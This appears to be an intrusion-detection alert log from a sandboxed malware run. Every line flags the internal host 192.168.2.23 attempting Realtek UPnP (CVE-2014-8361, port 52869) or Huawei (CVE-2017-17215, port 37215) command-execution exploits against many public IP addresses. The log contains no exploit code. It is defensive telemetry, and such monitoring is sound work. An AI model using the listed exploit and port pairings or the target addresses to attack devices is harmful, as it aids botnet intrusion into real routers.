                                      07/20/24-23:01:46.004063TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4077852869192.168.2.23104.155.48.50
                                      07/20/24-23:01:04.228026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5510037215192.168.2.23197.118.91.27
                                      07/20/24-23:01:41.947663TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4586252869192.168.2.23145.93.255.182
                                      07/20/24-23:00:59.158279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894437215192.168.2.2341.20.92.100
                                      07/20/24-23:02:04.577562TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615352452869192.168.2.2343.96.28.181
                                      07/20/24-23:01:01.782123TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4761452869192.168.2.2360.63.234.192
                                      07/20/24-23:01:42.374543TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5433852869192.168.2.23189.30.194.82
                                      07/20/24-23:01:55.296002TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614159652869192.168.2.23194.210.88.179
                                      07/20/24-23:00:57.222164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5154837215192.168.2.23172.101.164.72
                                      07/20/24-23:01:02.229743TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614796452869192.168.2.2371.113.201.241
                                      07/20/24-23:01:52.629007TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3430052869192.168.2.2331.0.108.140
                                      07/20/24-23:01:11.631728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5846637215192.168.2.23157.127.156.38
                                      07/20/24-23:01:41.991545TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614810452869192.168.2.23164.216.180.24
                                      07/20/24-23:01:50.075288TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4162452869192.168.2.23118.134.216.118
                                      07/20/24-23:01:52.629007TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23430052869192.168.2.2331.0.108.140
                                      07/20/24-23:01:10.251070TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613701052869192.168.2.23207.199.110.98
                                      07/20/24-23:01:31.322110TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4698252869192.168.2.23123.145.45.176
                                      07/20/24-23:02:01.256493TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613854252869192.168.2.2338.218.208.52
                                      07/20/24-23:02:11.791090TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614472852869192.168.2.23208.100.183.132
                                      07/20/24-23:01:21.928521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4611237215192.168.2.2365.112.198.241
                                      07/20/24-23:01:00.651026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3994037215192.168.2.23197.175.112.209
                                      07/20/24-23:01:53.357099TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25659652869192.168.2.23161.100.49.199
                                      07/20/24-23:01:46.444817TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5459652869192.168.2.23129.173.206.4
                                      07/20/24-23:01:41.228795TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613979852869192.168.2.2347.91.11.144
                                      07/20/24-23:01:43.607934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5151452869192.168.2.2341.215.7.68
                                      07/20/24-23:01:20.149798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857837215192.168.2.2323.212.5.129
                                      07/20/24-23:01:26.210078TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3679452869192.168.2.23174.98.46.120
                                      07/20/24-23:01:50.845923TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4426852869192.168.2.23128.114.73.170
                                      07/20/24-23:01:48.924853TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613990252869192.168.2.23146.33.84.180
                                      07/20/24-23:00:57.223887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5137637215192.168.2.2341.76.204.184
                                      07/20/24-23:01:34.044152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5946237215192.168.2.23197.79.71.16
                                      07/20/24-23:01:02.104572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3288637215192.168.2.23197.169.129.161
                                      07/20/24-23:01:47.663629TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3698252869192.168.2.23148.112.106.138
                                      07/20/24-23:01:00.639093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5208637215192.168.2.23197.182.113.83
                                      07/20/24-23:01:43.283253TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613726652869192.168.2.23223.250.7.213
                                      07/20/24-23:01:43.843278TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4005252869192.168.2.23159.183.134.67
                                      07/20/24-23:01:50.920103TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5712252869192.168.2.23192.255.251.248
                                      07/20/24-23:01:11.818830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4918237215192.168.2.2341.199.105.92
                                      07/20/24-23:01:53.066716TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4478252869192.168.2.2369.202.155.168
                                      07/20/24-23:01:44.411586TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3747652869192.168.2.2387.132.55.249
                                      07/20/24-23:00:57.221313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3734837215192.168.2.2386.49.143.0
                                      07/20/24-23:01:44.469580TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615746052869192.168.2.23165.29.53.230
                                      07/20/24-23:01:20.156820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4249637215192.168.2.23157.145.57.110
                                      07/20/24-23:01:02.064358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4142837215192.168.2.2341.158.142.0
                                      07/20/24-23:01:04.113037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360637215192.168.2.23197.209.73.42
                                      07/20/24-23:01:42.751499TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23874252869192.168.2.23110.76.42.187
                                      07/20/24-23:01:56.832956TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614247452869192.168.2.23162.18.0.14
                                      07/20/24-23:00:59.196993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5331037215192.168.2.23103.34.160.230
                                      07/20/24-23:01:27.650037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3645637215192.168.2.23187.218.18.191
                                      07/20/24-23:01:42.800757TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23440452869192.168.2.23157.252.110.127
                                      07/20/24-23:01:47.569820TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615961052869192.168.2.23118.111.39.192
                                      07/20/24-23:01:40.320408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3714637215192.168.2.23158.198.153.222
                                      07/20/24-23:01:42.151857TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615413652869192.168.2.23192.12.75.155
                                      07/20/24-23:01:13.185981TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615903052869192.168.2.23218.129.227.171
                                      07/20/24-23:01:55.428221TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25567852869192.168.2.2376.116.108.138
                                      07/20/24-23:01:47.931222TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5200652869192.168.2.2348.216.224.125
                                      07/20/24-23:01:08.667964TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24988252869192.168.2.23115.225.187.157
                                      07/20/24-23:01:13.314226TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4046452869192.168.2.23221.64.55.120
                                      07/20/24-23:01:06.989167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4024437215192.168.2.23197.83.239.39
                                      07/20/24-23:01:06.991143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3508837215192.168.2.2341.134.186.139
                                      07/20/24-23:01:50.395253TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615600252869192.168.2.2398.196.109.144
                                      07/20/24-23:01:08.567236TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25738652869192.168.2.23176.229.44.248
                                      07/20/24-23:01:31.313382TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3978452869192.168.2.2339.181.226.152
                                      07/20/24-23:01:46.512162TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3684452869192.168.2.2397.80.44.168
                                      07/20/24-23:01:08.634900TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4819652869192.168.2.23129.194.41.40
                                      07/20/24-23:01:42.486106TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615612252869192.168.2.23149.227.25.96
                                      07/20/24-23:01:02.726681TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615401252869192.168.2.23218.185.172.90
                                      07/20/24-23:01:31.991336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3299437215192.168.2.23197.240.6.181
                                      07/20/24-23:01:48.021704TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5375252869192.168.2.23210.173.156.193
                                      07/20/24-23:01:55.166507TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614627052869192.168.2.2375.33.175.78
                                      07/20/24-23:00:59.204975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5370637215192.168.2.23157.34.104.183
                                      07/20/24-23:01:02.104571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4341637215192.168.2.23157.54.52.201
                                      07/20/24-23:01:41.193880TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615346252869192.168.2.23151.105.247.52
                                      07/20/24-23:01:42.677933TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4933052869192.168.2.2340.200.215.102
                                      07/20/24-23:01:04.113037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3968237215192.168.2.2341.255.209.13
                                      07/20/24-23:01:48.858207TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615100652869192.168.2.23212.62.106.68
                                      07/20/24-23:01:04.627153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3709452869192.168.2.23185.31.200.232
                                      07/20/24-23:01:00.633642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4243437215192.168.2.23155.28.185.96
                                      07/20/24-23:01:31.317668TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5669252869192.168.2.2397.193.3.141
                                      07/20/24-23:01:49.040108TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6064852869192.168.2.2373.50.29.53
                                      07/20/24-23:01:45.519802TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3911252869192.168.2.23223.123.26.129
                                      07/20/24-23:01:43.182734TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5008852869192.168.2.23173.1.18.208
                                      07/20/24-23:01:44.001231TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614644652869192.168.2.23145.102.1.140
                                      07/20/24-23:01:56.353592TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614645652869192.168.2.2343.127.30.131
                                      07/20/24-23:02:51.152216TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615102052869192.168.2.23106.28.132.38
                                      07/20/24-23:02:53.715694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3832652869192.168.2.2373.65.166.64
                                      07/20/24-23:01:50.107973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4953052869192.168.2.23134.79.117.152
                                      07/20/24-23:01:48.560945TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4341452869192.168.2.23158.244.111.55
                                      07/20/24-23:01:31.330511TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24497652869192.168.2.23142.4.77.39
                                      07/20/24-23:01:31.974907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5930837215192.168.2.23157.77.110.3
                                      07/20/24-23:01:59.850516TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25644652869192.168.2.2364.55.184.24
                                      07/20/24-23:01:45.648154TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4929052869192.168.2.23179.206.84.130
                                      07/20/24-23:01:47.253863TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24965252869192.168.2.23130.112.45.111
                                      07/20/24-23:01:43.810783TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614963652869192.168.2.23192.175.188.159
                                      07/20/24-23:01:49.463055TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24222052869192.168.2.23126.245.117.149
                                      07/20/24-23:01:08.614193TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5484852869192.168.2.2345.158.122.120
                                      07/20/24-23:01:27.766239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5378237215192.168.2.23197.105.4.242
                                      07/20/24-23:01:24.904906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3850637215192.168.2.2347.200.89.27
                                      07/20/24-23:02:10.632121TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615746252869192.168.2.23113.241.33.36
                                      07/20/24-23:02:17.128771TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615571452869192.168.2.23201.34.254.148
                                      07/20/24-23:01:12.806645TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4002652869192.168.2.2344.76.102.214
                                      07/20/24-23:01:14.090830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3673437215192.168.2.23157.160.251.29
                                      07/20/24-23:01:41.276434TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4664852869192.168.2.23172.43.240.212
                                      07/20/24-23:01:51.968362TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5300252869192.168.2.239.210.224.238
                                      07/20/24-23:01:00.640312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6045237215192.168.2.2325.19.64.41
                                      07/20/24-23:01:02.055683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5812437215192.168.2.23197.68.112.71
                                      07/20/24-23:01:02.299793TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614571652869192.168.2.23130.136.141.197
                                      07/20/24-23:01:54.727406TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4925052869192.168.2.23174.110.120.103
                                      07/20/24-23:01:31.333805TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24739852869192.168.2.232.17.25.163
                                      07/20/24-23:01:45.119426TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615230052869192.168.2.2361.251.112.155
                                      07/20/24-23:01:00.635367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3379637215192.168.2.23157.139.28.102
                                      07/20/24-23:01:31.983105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842837215192.168.2.2341.177.221.69
                                      07/20/24-23:01:47.179280TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23974252869192.168.2.2339.76.169.126
                                      07/20/24-23:01:11.635828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3960837215192.168.2.2341.124.1.164
                                      07/20/24-23:01:24.876750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5897837215192.168.2.23197.245.203.130
                                      07/20/24-23:01:57.297792TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5470452869192.168.2.23204.80.169.189
                                      07/20/24-23:01:40.320408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5878837215192.168.2.23191.219.30.38
                                      07/20/24-23:00:59.211046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4478037215192.168.2.23219.159.165.91
                                      07/20/24-23:01:44.783923TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23279252869192.168.2.23155.22.111.5
                                      07/20/24-23:01:46.403723TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5357252869192.168.2.23153.234.108.85
                                      07/20/24-23:02:08.135557TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615315252869192.168.2.23132.64.30.154
                                      07/20/24-23:01:47.535939TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5378452869192.168.2.23129.40.249.193
                                      07/20/24-23:01:25.752492TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615294252869192.168.2.23203.166.233.2
                                      07/20/24-23:01:20.110860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5342437215192.168.2.23216.95.253.44
                                      07/20/24-23:01:41.648203TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4172852869192.168.2.23150.183.54.123
                                      07/20/24-23:01:53.494330TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25149252869192.168.2.2369.58.59.239
                                      07/20/24-23:01:06.988055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975437215192.168.2.23197.232.66.29
                                      07/20/24-23:01:00.640312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709637215192.168.2.23197.124.34.30
                                      07/20/24-23:01:40.322860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4807037215192.168.2.23197.89.86.7
                                      07/20/24-23:01:04.031511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4411837215192.168.2.2341.78.221.227
                                      07/20/24-23:01:11.631728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3321837215192.168.2.23167.41.22.33
                                      07/20/24-23:01:42.411586TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5546852869192.168.2.23123.91.96.233
                                      07/20/24-23:01:58.945733TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615197852869192.168.2.2348.97.254.151
                                      07/20/24-23:01:31.328855TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23358452869192.168.2.23100.45.46.163
                                      07/20/24-23:01:08.684499TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23456652869192.168.2.23123.31.253.14
                                      07/20/24-23:01:27.654173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3506837215192.168.2.23197.113.24.234
                                      07/20/24-23:01:03.231165TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613863052869192.168.2.23216.151.5.50
                                      07/20/24-23:01:45.270636TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4115452869192.168.2.23126.252.220.138
                                      07/20/24-23:01:34.060991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4528637215192.168.2.23197.0.183.138
                                      07/20/24-23:01:45.683188TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4912852869192.168.2.2366.34.14.57
                                      07/20/24-23:01:02.048367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4893437215192.168.2.23157.121.108.79
                                      07/20/24-23:00:57.221570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4257437215192.168.2.2341.240.149.129
                                      07/20/24-23:01:20.202325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414637215192.168.2.2341.130.131.66
                                      07/20/24-23:03:53.978924TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613700452869192.168.2.2324.105.77.87
                                      07/20/24-23:01:49.921076TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4420052869192.168.2.2375.3.82.5
                                      07/20/24-23:01:42.535137TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4362052869192.168.2.23104.24.229.93
                                      07/20/24-23:01:10.539170TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615390652869192.168.2.23167.63.84.166
                                      07/20/24-23:01:57.022868TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5194452869192.168.2.23186.85.31.59
                                      07/20/24-23:01:02.048367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3323037215192.168.2.2341.199.182.217
                                      07/20/24-23:01:50.246033TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5462252869192.168.2.2392.182.23.52
                                      07/20/24-23:01:07.033766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5408037215192.168.2.23124.52.73.80
                                      07/20/24-23:00:59.187842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5223437215192.168.2.23157.17.98.184
                                      07/20/24-23:01:07.082045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6084037215192.168.2.2341.40.31.82
                                      07/20/24-23:01:31.982479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3928037215192.168.2.23157.123.230.172
                                      07/20/24-23:01:59.704241TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5242052869192.168.2.23162.200.88.148
                                      07/20/24-23:01:07.054782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3809437215192.168.2.2341.70.153.225
                                      07/20/24-23:01:43.944379TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3387252869192.168.2.23175.186.207.187
                                      07/20/24-23:01:34.050313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5052237215192.168.2.2341.201.163.171
                                      07/20/24-23:01:08.572790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3643652869192.168.2.2325.68.235.59
                                      07/20/24-23:01:20.096752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922037215192.168.2.23157.154.59.174
                                      07/20/24-23:01:48.177682TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5845052869192.168.2.23158.186.31.24
                                      07/20/24-23:01:10.641552TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613758252869192.168.2.232.129.228.59
                                      07/20/24-23:01:02.462458TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615665252869192.168.2.23219.105.54.148
                                      07/20/24-23:01:46.158533TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615457052869192.168.2.2363.237.109.125
                                      07/20/24-23:01:02.048214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4951637215192.168.2.23157.195.164.122
                                      07/20/24-23:01:48.649139TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25485452869192.168.2.23155.90.77.175
                                      07/20/24-23:01:07.061779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643237215192.168.2.23157.45.105.246
                                      07/20/24-23:01:20.119972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4455437215192.168.2.2341.175.17.192
                                      07/20/24-23:01:49.158487TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5008852869192.168.2.23116.148.59.65
                                      07/20/24-23:00:59.161892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5275237215192.168.2.23157.176.101.215
                                      07/20/24-23:01:31.313163TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4823052869192.168.2.23109.17.111.246
                                      07/20/24-23:01:47.005094TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614935852869192.168.2.23123.198.127.136
                                      07/20/24-23:00:59.153608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5361037215192.168.2.2341.178.183.186
                                      07/20/24-23:01:04.950811TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3340052869192.168.2.23111.160.194.136
                                      07/20/24-23:01:09.002255TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23811652869192.168.2.239.91.73.111
                                      07/20/24-23:01:46.725077TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4084852869192.168.2.23200.222.88.102
                                      07/20/24-23:01:21.928521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4274237215192.168.2.2375.171.235.169
                                      07/20/24-23:01:00.633744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5980637215192.168.2.23197.99.9.223
